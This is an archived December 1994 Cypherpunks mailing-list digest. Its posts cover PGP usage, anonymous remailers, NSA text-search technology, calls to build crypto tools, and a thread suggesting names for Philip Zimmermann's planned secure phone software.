> ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
> ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )

___
/\ PGP the Cutting Edge of Privacy
/vvvvvvvvvvvv \-------------------------------------\
| WARRIOR ( |PGP Key Id 0X71FADEAD > Veritas Vincit
`^^^^^^^^^^^^ /=====================================/
\/ Finger for PGP 2.6.2 public Key.

PGP Fingerprint 59 BB DD BC BA E6 C7 77 34 81 09 92 62 6C 74
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
| Dave M.
Harvey warrior at infinet.com|
| PO Box 151311 dharvey at freenet.columbus.oh.us|
| Columbus, OH 43215-8311 fm063 at cleveland.freenet.edu|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From pgut01 at cs.aukuni.ac.nz Sun Dec 18 11:10:18 1994
From: pgut01 at cs.aukuni.ac.nz (Peter Claus Gutmann)
Date: Sun, 18 Dec 94 11:10:18 PST
Subject: No Subject
Message-ID: <9412181909.AA13029@cs7.cs.aukuni.ac.nz>

>We haven't heard from Peter Gutmann yet (probably because he is so busy), but
>if he turns up it would be interesting to hear about any future plans for SFS.
>I don't mind explaining a little bit about some areas of cryptanalysis, maybe
>the various sieves. Chris might want to talk about some hardware ideas.

I seem to have been dropped in at the tail end of the discussion, so if you can let me know what it's about I'll be able to disagree with you about it.

Peter.

From jburrell at crl.com Sun Dec 18 12:15:33 1994
From: jburrell at crl.com (Jason Burrell)
Date: Sun, 18 Dec 94 12:15:33 PST
Subject: PGP-Pine Scripts?
Message-ID: <199412182020.PAA12545@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Are there any scripts out there to set Pine 3.91 up to use PGP for message encryption and signing? I would prefer to stay away from installing a 1MB+ executable, since I have neither the root privileges on this machine or the disk space for such an endeavour.

Thanks.

- --
Jason Burrell | PGP 2.6 public key available by finger.
Geek Code (V2.1): | GCS/CM/S/M d++ H s:+ !g !p+ !au !a w+++ v+\(---)>!v
San Antonio, TX | C++ UC+ P+>++++ L+ 3 E+ N+++ K--- W--- M-- !V -po+
| Y++ t++++ 5+++ jx R+ G tv++ b++ D- B-- e u++>+++ h* f+
| r* n---->+++ y?
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From ianf at sydney.sgi.com Sun Dec 18 15:38:34 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Sun, 18 Dec 94 15:38:34 PST
Subject: Processing data, information and knowledge
In-Reply-To:
Message-ID: <9412191024.ZM26819@wiley.sydney.sgi.com>

On Dec 16, 5:26pm, rishab at dxm.ernet.in wrote:
> The alternative comes strangely enough from the US
> National Security Agency. It has always been suspected
> that the NSA searches through e-mail traffic for
> 'sensitive' material, which for the large volumes involved
> would require considerable help from computers.

I always imagined that the development of the algorithm itself predated email, and started back with cable and telex traffic.

> Earlier
> this year, the agency began soliciting collaborations from
> business to develop commercial applications of their
> technique. It claimed to be able to quickly search through
> large quantities of text, in any language, for
> similarities to sample documents, and even automatically
> sort documents according to topics that it identifies. A
> similar though independently developed system is available
> from California-based Architext.

Has anyone got any further information about how this algorithm works? It sounds like Rishab has somewhat better info than was publicly available months ago when we last discussed this particular NSA "technology transfer".

Ian.

From werewolf at io.org Sun Dec 18 15:40:31 1994
From: werewolf at io.org (Mark Terka)
Date: Sun, 18 Dec 94 15:40:31 PST
Subject: Remailer at myriad.pc.cc.cmu.edu??
Message-ID: <199412182340.SAA12373@grin.io.org>

I take it the above remailer has bitten the dust? I didn't see it in Ralph's last list.

From sameer at c2.org Sun Dec 18 17:32:00 1994
From: sameer at c2.org (sameer)
Date: Sun, 18 Dec 94 17:32:00 PST
Subject: The NEXUS-Berkeley Presents: a New Years Party
Message-ID: <199412190118.RAA17103@infinity.c2.org>

If you get this note, then you're invited. Please don't forward this anywhere else, but you're welcome to bring friends. Apologies if you receive duplicates.

--
Date: Dec 31, 1994 -> Jan 1, 1995
Time: 8PM-?
Place: The NEXUS-Berkeley, Berkeley CA
--

Please join us at the NEXUS-Berkeley while we bring in the new year, as it happens in New York, Chicago, Anchorage, and other cities around the continent. (I would include here the Australian sites but that would require that the party start approx. 7 AM on the 31st...)

We expect other nexus-locations to be wired into the net along with us, although the connectivity at the other locations will probably be minimal. For all I know they might not be wired at all, leaving us with only our own new years to celebrate.

In any case, I expect to have approximately 7 terminals which people can use to communicate with the other cities. (Then again, for all I know that might not happen.. We might not even have -1-... Ah the flux of life.)

Bring someone to share. (You should also bring some-things- to share too, like drinks, snacks, etc.)

Please RSVP for directions. (Mail sameer at c2.org.. I'd like to get an idea of how many people to expect, etc..)

Thanks.

--
sameer Voice: 510-841-2014
Master Conspirator Pager: 510-321-1014
Community ConneXion: The NEXUS-Berkeley Dialin: 510-549-1383
http://www.c2.org (or login as "guest") sameer at c2.org

From amanda at intercon.com Sun Dec 18 17:53:15 1994
From: amanda at intercon.com (Amanda Walker)
Date: Sun, 18 Dec 94 17:53:15 PST
Subject: Doomsaying, development, and deployment
Message-ID: <9412182053.AA02959@eldamar.walker.org>

A number of people have been saying things that amount to "imminent death of the Cypherpunks mailing list predicted, film at 11."
Well, folks, if it dies, it will be the fault of those who just pick up their toys and go home.

There's been a fair amount of discontent here in the last year. I don't think it's a matter of any one flameful discussion (of which many have gone by recently). Rather, I think it's a matter of frustration. PGP has achieved a fair amount of recognition in the user community at large, and lately even in the mainstream press. However, beyond PGP and some anonymous remailers, there's not a lot else out there.

There won't *be* anything unless we build it. No one's going to come riding in on his white horse to hand us crypto-security. We all agree we need better tools, and that everyone else needs better tools before they'll start adopting the technology we so fiercely believe can save us from the erosion of our civil liberty and personal privacy.

So let's build those tools. Strange as it may seem, I actually have to weigh in on the side of Netscape in some of the arguments that have come by in the last week or so. They are building stuff, after all. That's better than most of the people on this list, from what I can tell.

To put my money where my mouth is, I'll shut up completely until I can post an announcement of some useful crypto tool. It might be commercial, but it might be free--my employer does occasionally agree to give stuff away for the good of the Internet.

Amanda Walker
InterCon Systems Corporation

From ianf at sydney.sgi.com Sun Dec 18 18:24:01 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Sun, 18 Dec 94 18:24:01 PST
Subject: The NEXUS-Berkeley Presents: a New Years Party
In-Reply-To: <199412190118.RAA17103@infinity.c2.org>
Message-ID: <9412191315.ZM27253@wiley.sydney.sgi.com>

On Dec 18, 5:18pm, sameer wrote:
> Date: Dec 31, 1994 -> Jan 1, 1995
> Time: 8PM-?
> Place: The NEXUS-Berkeley, Berkeley CA
[...]
> around the continent. (I would include here the Australian sites but
> that would require that the party start approx. 7 AM on the 31st...)

You've got your timezones wrong here: we on the East coast of Australia are currently 19 hours ahead of Berkeley, and so we'd need to be there at 3 PM on the 1st of January.

Your new year in Berkeley will be 7 PM our time, and as the television fare will surely be woeful (has-been British and American actors in tired New Years Day Specials), I am sure that at least a few of us might be looking for other amusements.

I'll be off recovering from the previous night, but others may want to get involved if you want to include Oz members.

Ian.

From Tony.Gurnick at nzdairy.co.nz Sun Dec 18 18:25:30 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Sun, 18 Dec 94 18:25:30 PST
Subject: 2048 bit keys
Message-ID: <94121915233879@nzdairy.co.nz>

I saw a thread here a couple of weeks ago about generating 2048 bit keys after the 15-dec. I can't remember how to do it, can somebody please enlighten me???

T

From skaplin at skypoint.com Sun Dec 18 18:26:15 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Sun, 18 Dec 94 18:26:15 PST
Subject: Storm Brewing Over Forged Bob Rae Posting?
In-Reply-To: <199412112031.MAA21646@netcom12.netcom.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article , you wrote:

> Here's an idea. Someone mentioned trying to set up an anon remailer on the
> North American Freenets, but it seemed there were software compatibility
> problems.

I'm the one guilty of that, the thread was under "Guerrilla Remailers." I wonder if it is possible to call procmail on these systems via the .forward file. If it is, why couldn't we write a procmail .procmailrc file to sanitize the headers? Drop three files in place and the remailer is up and running. Anyone have a freenet account to find out if this is possible?

Please note this tagline, it seems quite apropos lately.

==============================================================================
Our major obligation is not to mistake slogans for solutions. - Edward R.
Murrow
==============================================================================
skaplin at skypoint.com | "...vidi vici veni" - Overheard
| outside a Roman brothel.
PGP encrypted mail is accepted and |
preferred. | Change is the only constant in the
| Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or |
Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message digitally signed to verify the identity of the sender
-----END PGP SIGNATURE-----

From prz at acm.org Sun Dec 18 18:47:18 1994
From: prz at acm.org (Philip Zimmermann)
Date: Sun, 18 Dec 94 18:47:18 PST
Subject: Name that phone
Message-ID:

I'm trying to come up with a name for the secure phone software I'm planning on releasing. The software would turn any multimedia PC into a secure phone.

I'm open to suggestions for the name. Some names that have been suggested:

1) Voice PGP
2) Pretty Good Secure Phone (PGSP)
3) PGP Phone

I like 2 or 3. Does anyone want to suggest other names, or vote for which of these is better? Send your replies to prz at acm.org, with the subject line of "Name that phone". The winner will get a free copy. But then, so will a lot of other people.

From lmccarth at bali.cs.umass.edu Sun Dec 18 19:03:03 1994
From: lmccarth at bali.cs.umass.edu (L. McCarthy)
Date: Sun, 18 Dec 94 19:03:03 PST
Subject: Remailer at myriad.pc.cc.cmu.edu??
Message-ID: <199412190308.WAA15583@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Mark Terka writes:
> I take it the above remailer has bitten the dust? I didn't see it in Ralph's
> last list.

I asked about this on the remailer-operators list the other day. It seems Matt G. asked Raph to remove it from the list temporarily; I think he's just gone on vacation for a little while.

- - -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From warrior at infinet.com Sun Dec 18 20:19:14 1994
From: warrior at infinet.com (warrior)
Date: Sun, 18 Dec 94 20:19:14 PST
Subject: Name that phone
In-Reply-To:
Message-ID:

Secure Vox or Vox PGP

On Sun, 18 Dec 1994, Philip Zimmermann wrote:

> I'm trying to come up with a name for the secure phone software I'm
> planning on releasing. The software would turn any multimedia PC
> into a secure phone.
>
> I'm open to suggestions for the name. Some names that have been
> suggested:
>
> 1) Voice PGP
> 2) Pretty Good Secure Phone (PGSP)
> 3) PGP Phone
>
> I like 2 or 3. Does anyone want to suggest other names, or vote for
> which of these is better? Send your replies to prz at acm.org, with the
> subject line of "Name that phone". The winner will get a free copy.
> But then, so will a lot of other people.
>
>

___
/\ PGP the Cutting Edge of Privacy.
/vvvvvvvvvvvv \-----------------------------------\
| WARRIOR ( | PGP Key Id 0X71FADEAD > Magnus Frater Videt Tu
`^^^^^^^^^^^^ /===================================/
\/ Finger for PGP 2.6.2 public Key.

PGP Fingerprint 59 BB DD BC BA E6 C7 77 34 81 09 92 62 6C 74
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
| Dave M. Harvey warrior at infinet.com|
| PO Box 151311 dharvey at freenet.columbus.oh.us|
| Columbus, OH 43215-8311 fm063 at cleveland.freenet.edu|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From werewolf at io.org Sun Dec 18 20:57:10 1994
From: werewolf at io.org (Mark Terka)
Date: Sun, 18 Dec 94 20:57:10 PST
Subject: Storm Brewing Over Forged Bob Rae Posting?
In-Reply-To: <199412112031.MAA21646@netcom12.netcom.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article , skaplin at skypoint.com (Samuel Kaplin) wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article , you wrote:
>
>> Here's an idea. Someone mentioned trying to set up an anon remailer on the
>> North American Freenets, but it seemed there were software compatibility
>> problems.
>
>I'm the one guilty of that, the thread was under "Guerrilla Remailers." I
>wonder if it is possible to call procmail on these systems via the
>.forward file. If it is, why couldn't we write a procmail .procmailrc file
>to sanitize the headers? Drop three files in place and the remailer is up
>and running. Anyone have a freenet account to find out if this is possible?

Well I have an account on the Cleveland Freenet. Fire me over the necessary files with the instructions and we'll see pretty quickly whether it's doable or not.

I guess we'll also find out real fast (if it works) how long the freenet authorities will let it keep running...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From meconlen at IntNet.net Sun Dec 18 21:14:59 1994
From: meconlen at IntNet.net (Michael Conlen)
Date: Sun, 18 Dec 94 21:14:59 PST
Subject: MIME (again)
In-Reply-To: <199412152043.PAA26851@dunx1.ocs.drexel.edu>
Message-ID:

On Thu, 15 Dec 1994, Bob Snyder wrote:

> Only if the user chose to send things in application/pgp (or is it
> text/pgp?) If they chose to send text/plain, they'd never have to
> deal with PGP.
>
> Forcing PGP down people's throats is not a way of winning "converts."
> You need to convince them of the need, they present well-integrated
> tools that make it simple. If you try to force people to use PGP,
> they'll find work-arounds and do what they can to avoid it.

True, I never want to force people to use something, however an application so universally used such as e-mail would make a good place to present PGP and allow people to have access to it without downloading and compiling PGP for themselves, for each computer that uses PGP, etc. If PGP remains as obscure to those not interested in crypto, then I think the program will not reach the people it is intended for, the masses. Not everyone knows how to compile a program, or has the interest in it enough to read the docs that come with it to set it up. This is the reason I have not used it yet, because of just getting it set up.

Groove on Dude
Michael Conlen

From sdw at lig.net Sun Dec 18 21:32:07 1994
From: sdw at lig.net (Stephen D. Williams)
Date: Sun, 18 Dec 94 21:32:07 PST
Subject: Doomsaying, development, and deployment
In-Reply-To: <9412182053.AA02959@eldamar.walker.org>
Message-ID:

...
> So let's build those tools. Strange as it may seem, I actually have to weigh
> in on the side of Netscape in some of the arguments that have come by in the
> last week or so. They are building stuff, after all. That's better than most
> of the people on this list, from what I can tell.

How about starting a todo list so we can reach a consensus on a prioritized list of goals. This may help us come up with projects we can work together on.

I'm itching to do some coding...

> To put my money where my mouth is, I'll shut up completely until I can post an
> announcement of some useful crypto tool. It might be commercial, but it might
> be free--my employer does occasionally agree to give stuff away for the good
> of the Internet.
>
>
>
> Amanda Walker
> InterCon Systems Corporation

sdw
--
Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw
Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95
OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94

From jrt at asiaonline.net Sun Dec 18 21:57:15 1994
From: jrt at asiaonline.net (jRT)
Date: Sun, 18 Dec 94 21:57:15 PST
Subject: Name that phone
In-Reply-To:
Message-ID:

On Sun, 18 Dec 1994, Philip Zimmermann wrote:

> I'm trying to come up with a name for the secure phone software I'm
> planning on releasing. The software would turn any multimedia PC
> into a secure phone.

Good luck with it. From the name it figures that you're gonna use the PGP as the engine.

As an aside, several years ago... I knew people who used 'crypto-phones'...all they did was time-slicing and basic simple scrambling.
They sliced up the conversation into 1/100ths of a second and regurgitated it at the other end. A friend of mine could listen to the 'encoded' output and tell you exactly what they were saying...in real time :>

I guess PGP should be better (or 1/10000 sec time slices :> ) just for interest.

jRT

From sdw at lig.net Sun Dec 18 22:04:35 1994
From: sdw at lig.net (Stephen D. Williams)
Date: Sun, 18 Dec 94 22:04:35 PST
Subject: Name that phone
In-Reply-To:
Message-ID:

>
>
> Secure Vox or Vox PGP

VeriVox (Isn't VeriPhone in existence? sounds familiar)
PriVox (PriVoxy)
DOS Vox (Dome of Silence ...)
LB Vox (Little Brother Speaks, and no one can hear)
Vox/1994 (tenuous reference to conquering 1984/BB, 1994 being somewhat year of public crypto, etc. Oh, nevermind. )

Private is my adjective of choice lately since laypeople don't know what crypto is and secure seems ambiguous to me (in laymen's mindset).

> On Sun, 18 Dec 1994, Philip Zimmermann wrote:
>
> > I'm trying to come up with a name for the secure phone software I'm
> > planning on releasing. The software would turn any multimedia PC
> > into a secure phone.
> >
> > I'm open to suggestions for the name. Some names that have been
> > suggested:
> >
> > 1) Voice PGP
> > 2) Pretty Good Secure Phone (PGSP)
> > 3) PGP Phone
> >
> > I like 2 or 3. Does anyone want to suggest other names, or vote for
> > which of these is better? Send your replies to prz at acm.org, with the
> > subject line of "Name that phone". The winner will get a free copy.
> > But then, so will a lot of other people.
> >
> >
>
> ___
> /\ PGP the Cutting Edge of Privacy.
> /vvvvvvvvvvvv \-----------------------------------\
> | WARRIOR ( | PGP Key Id 0X71FADEAD > Magnus Frater Videt Tu
> `^^^^^^^^^^^^ /===================================/
> \/ Finger for PGP 2.6.2 public Key.
>
> PGP Fingerprint 59 BB DD BC BA E6 C7 77 34 81 09 92 62 6C 74
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> | Dave M.
Harvey warrior at infinet.com|
> | PO Box 151311 dharvey at freenet.columbus.oh.us|
> | Columbus, OH 43215-8311 fm063 at cleveland.freenet.edu|
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>
>

--
Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw
Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95
OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94

From xpat at vm1.spcs.umn.edu Sun Dec 18 22:47:37 1994
From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu)
Date: Sun, 18 Dec 94 22:47:37 PST
Subject: Secure Phone software
Message-ID: <9412190647.AA19841@toad.com>

On Sun, 18 Dec 1994, Philip Zimmermann wrote:

> I'm trying to come up with a name for the secure phone software I'm
> planning on releasing. The software would turn any multimedia PC
> into a secure phone.

OK, how about:

IronClad
StonePhone
BuzzOff
SpeakEasy
SpeakFreely
BlackHole
BlackPipe
SecurePipe
MYOB (Mind Your Own Business, in the spirit of PGP)
Wall To Wall (WTW) <--this gets my vote

----------------------------------------------------------------------
P M Dierking xpat at vm1.spcs.umn.edu |

From blancw at pylon.com Sun Dec 18 22:49:12 1994
From: blancw at pylon.com (blancw at pylon.com)
Date: Sun, 18 Dec 94 22:49:12 PST
Subject: Name that phone
Message-ID: <199412190649.WAA16857@deepthought.pylon.com>

MMPCPGPVSP ( MultiMedia PC PGP-Voice-Secure Phone )

PGVEPCP ( Pretty Good Voice Encrypted PC Phone )

Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho Ho

Blanc

From nobody at rebma.rebma.mn.org Sun Dec 18 23:12:28 1994
From: nobody at rebma.rebma.mn.org (nobody at rebma.rebma.mn.org)
Date: Sun, 18 Dec 94 23:12:28 PST
Subject: NONE
Message-ID: <199412190814.CAA18021@rebma.rebma.mn.org>

Matthew Ghio,

You've done a great job in the past and continue to do so, but for the past week some (all?) of your users have not been getting any mail. What happened? Post to cypherpunks, remailer-operators, alt.privacy or alt.anonymous.messages, alt.abuse.recovery (either one. You choose).

Thanks.

END

From norm at netcom.com Sun Dec 18 23:21:09 1994
From: norm at netcom.com (Norman Hardy)
Date: Sun, 18 Dec 94 23:21:09 PST
Subject: MacPGP
Message-ID:

Now I have something nice to say about MacPGP: It can take its input and output from the clip board. This makes it about half as much work as it was before. Look in "Dialog Shortcuts" under the "Options" menu.

From skaplin at skypoint.com Sun Dec 18 23:33:16 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Sun, 18 Dec 94 23:33:16 PST
Subject: Name that phone (fwd)
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article , you wrote:

> I like 2 or 3. Does anyone want to suggest other names, or vote for
> which of these is better? Send your replies to prz at acm.org, with the
> subject line of "Name that phone".
The winner will get a free copy.
> But then, so will a lot of other people.

Hi Phil,

How about S.P.I.T.

S ecure
P hone
I mplementation or interphase
T erminal or technology

Then you could S.P.I.T. on the government as they tried to listen to your conversations or S.P.I.T. on your employer as they tried to monitor your phone usage. Or you could S.P.I.T. in the wind if you have no one to call. ;)

More names will probably follow.

Sam

==============================================================================
If you think education is expensive, try ignorance. - Derek Bok, 1978
==============================================================================
skaplin at skypoint.com | "...vidi vici veni" - Overheard
| outside a Roman brothel.
PGP encrypted mail is accepted and |
preferred. | Change is the only constant in the
| Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or |
Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message digitally signed to verify the identity of the sender
-----END PGP SIGNATURE-----

From jrochkin at cs.oberlin.edu Sun Dec 18 23:46:03 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Sun, 18 Dec 94 23:46:03 PST
Subject: Name that phone (fwd)
Message-ID:

At 2:26 AM 12/19/94, Samuel Kaplin wrote:
>More names will probably follow.

Um, could they maybe not follow to the cypherpunks list? Phil asked people to send suggestions to him with a particular subject.
He didn't ask people to send them to the cypherpunks list. I hope I'm not being overly annoyed here, but I just don't particularly relish the thought of 10 posts a day for the next two weeks composed of suggestions for what to call Phil's crypto phone.

Then again, I guess they aren't too much worse than 50 posts a day about the merits of MIME, or whether Mosaic Communications is Evil Incarnate or Just Good Capitalists. But best of all would be to have neither those posts nor posts saying "Hey Phil, how about 'Phil's Sooper Kean-o War3z D00d Ph0n3'? (PSKWDP) Cool, right?"

From witter at utdallas.edu Sun Dec 18 23:57:45 1994
From: witter at utdallas.edu (witter at utdallas.edu)
Date: Sun, 18 Dec 94 23:57:45 PST
Subject: Name that phone
In-Reply-To:
Message-ID:

Cryptriloquist- crypto & ventriloquist
SFS- Safe Fone System
Zimmerphone
Tapestry- reference to weft & warp of Individual threads
Social Security- Only seems fair that we should have something of that name that is functional.
murmur
The Village Voice
Echo- The nymph whose unrequited love for Narcissus caused her to pine away until nothing but her voice remained.
phonetiquette- phone, phonetic, & etiquette
Re-Voice
Babbler- a tape recording of several dozen voices talking at the same time, used as an antibugging device to make private or secret conversations inaudible to eavesdroppers.
New Obiter Dictum (NOD)- An incidental remark or observation; a passing comment.
Phone DeBug (PDB)
AIWWA- As if we were alone
:o- or your emoticon of choice, it would be the first software to be titled under a non-alphabetical symbol.

My question is if/how this new software would work between modems.

:.:.:.:.:.:.:.:.:
: Paper_Soldier :
:.:.:.:.:.:.:.:.:

From lmccarth at bali.cs.umass.edu Mon Dec 19 00:12:00 1994
From: lmccarth at bali.cs.umass.edu (L. McCarthy)
Date: Mon, 19 Dec 94 00:12:00 PST
Subject: Name that phone elsewhere
Message-ID: <199412190816.DAA18843@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Jonathan Rochkind writes:
> Then again, I guess they aren't too much worse than 50 posts a day about
> the merits of MIME, or whether Mosaic Communications is Evil Incarnate or
> Just Good Capitalists. But best of all would be to have neither those
> posts nor posts saying "Hey Phil, how about 'Phil's Sooper Kean-o War3z
> D00d Ph0n3'? (PSKWDP) Cool, right?"

I agree. This is in danger of turning into a variant of the c'punks logo thread, to which I unfortunately contributed a couple of times in public.

Please send groovy name suggestions to PRZ, but please don't cc: them here.

- - -L. Futplex McCarthy; PGP key by finger or server
"The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." --FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From skaplin at skypoint.com Mon Dec 19 02:22:44 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Mon, 19 Dec 94 02:22:44 PST
Subject: Name that phone elsewhere
In-Reply-To: <199412190816.DAA18843@bb.hks.net>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <199412190816.DAA18843 at bb.hks.net>, you wrote:

> Jonathan Rochkind writes:
> > Then again, I guess they aren't too much worse than 50 posts a day about
> > the merits of MIME, or whether Mosaic Communications is Evil Incarnate or
> > Just Good Capitalists. But best of all would be to have neither those
> > posts nor posts saying "Hey Phil, how about 'Phil's Sooper Kean-o War3z
> > D00d Ph0n3'? (PSKWDP) Cool, right?"
>
> I agree. This is in danger of turning into a variant of the c'punks logo
> thread, to which I unfortunately contributed a couple of times in public.
>
> Please send groovy name suggestions to PRZ, but please don't cc: them here.

The reason I forwarded the message here, was that I thought it might elicit a chuckle from some. After all the infighting here lately I thought some comic relief might help lighten things up a bit. Evidently I was wrong. I stand humbly censored before you all. ;) <--denotes tongue in cheek

Sam

==============================================================================
Actual war is a very messy business. Very, very messy business.
-- Kirk, "A Taste of Armageddon", stardate 3193.0
==============================================================================
skaplin at skypoint.com                  | "...vidi vici veni" - Overheard
                                        | outside a Roman brothel.
PGP encrypted mail is accepted and      |
preferred.                              | Change is the only constant in the
                                        | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or |
Finger skaplin at mirage.skypoint.com   | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message digitally signed to verify the identity of the sender
-----END PGP SIGNATURE-----

From skaplin at skypoint.com Mon Dec 19 02:43:18 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Mon, 19 Dec 94 02:43:18 PST
Subject: Any suggestions for additions to this?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

My auto-responder is up, but not all of the files listed are there yet. Anybody have any suggestions for additions to the list?

Sam

- ---------------------------------------------------------------------------

This is the index for Sam Kaplin's Auto-Responder.

To get a file:

Send a message to: skaplin at c2.org
The subject of the message MUST BE: SEND FILE [file_name]

EXAMPLE:

Subject: SEND FILE help

All binary files are UUENCODED with PGP signatures.

Please address all comments or problems to skaplin at skypoint.com. If you receive a blank message back, then the file you requested does not exist. Please note that a copy of your request will be logged. Should you have a crypto related file that you would like added, contact me at: skaplin at skypoint.com. Please note that I am subject to the petty whims of the U.S. government, so I will not add any files which may be subject to ITAR.
File Name        Description
- --------------------------------------------------------------------------
apgp212_1.uue    Autopgp 2.12 offline mail packet processor.
                 Automates PGP functions. Part 1 of 4
apgp212_2.uue    Autopgp 2.12 offline mail packet processor.
                 Automates PGP functions. Part 2 of 4
apgp212_3.uue    Autopgp 2.12 offline mail packet processor.
                 Automates PGP functions. Part 3 of 4
apgp212_4.uue    Autopgp 2.12 offline mail packet processor.
                 Automates PGP functions. Part 4 of 4
apgp22b2_1.uue   Autopgp 2.2b2 offline mail packet processor.
                 Automates PGP functions. Part 1 of 4 BETA
apgp22b2_2.uue   Autopgp 2.2b2 offline mail packet processor.
                 Automates PGP functions. Part 2 of 4 BETA
apgp22b2_3.uue   Autopgp 2.2b2 offline mail packet processor.
                 Automates PGP functions. Part 3 of 4 BETA
apgp22b2_4.uue   Autopgp 2.2b2 offline mail packet processor.
                 Automates PGP functions. Part 4 of 4 BETA
help             This file.
key              Sam Kaplin's PGP Public keys.
pgpfaq           Frequently asked questions about PGP.
wherefaq         Where to obtain PGP.

==============================================================================
Diplomats are just as essential to starting a war as soldiers are for finishing it.... You take diplomacy out of war, and the thing would fall flat in a week.
- Will Rogers
==============================================================================
skaplin at skypoint.com                  | "...vidi vici veni" - Overheard
                                        | outside a Roman brothel.
PGP encrypted mail is accepted and      |
preferred.                              | Change is the only constant in the
                                        | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or |
Finger skaplin at mirage.skypoint.com   | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message digitally signed to verify the identity of the sender
-----END PGP SIGNATURE-----

From j.hastings6 at genie.geis.com Mon Dec 19 09:41:31 1994
From: j.hastings6 at genie.geis.com (j.hastings6 at genie.geis.com)
Date: Mon, 19 Dec 94 09:41:31 PST
Subject: Karl Hess - L.A. area meeting
Message-ID: <199412191741.AA201158861@relay2.geis.com>

-----BEGIN PGP SIGNED MESSAGE-----

"Extremism in the defense of liberty is no vice, and let me remind you, moderation in the pursuit of justice is no virtue." -- Karl Hess

Meeting at Cheviot Hills (in Los Angeles) CALIFORNIA U-S-A-

I will leave town right after this meeting -- to visit relatives and possibly attend this year's RSA conference January 9-11.

The following text was written by SEK3 (with notes by JKH):

--- K A R L H E S S C L U B ---

REVOLUTION, REACTION or BETRAYAL?
A Special 3-Part Post Election Series

Monday, December 19, 1994 (That's tonight, yikes!)

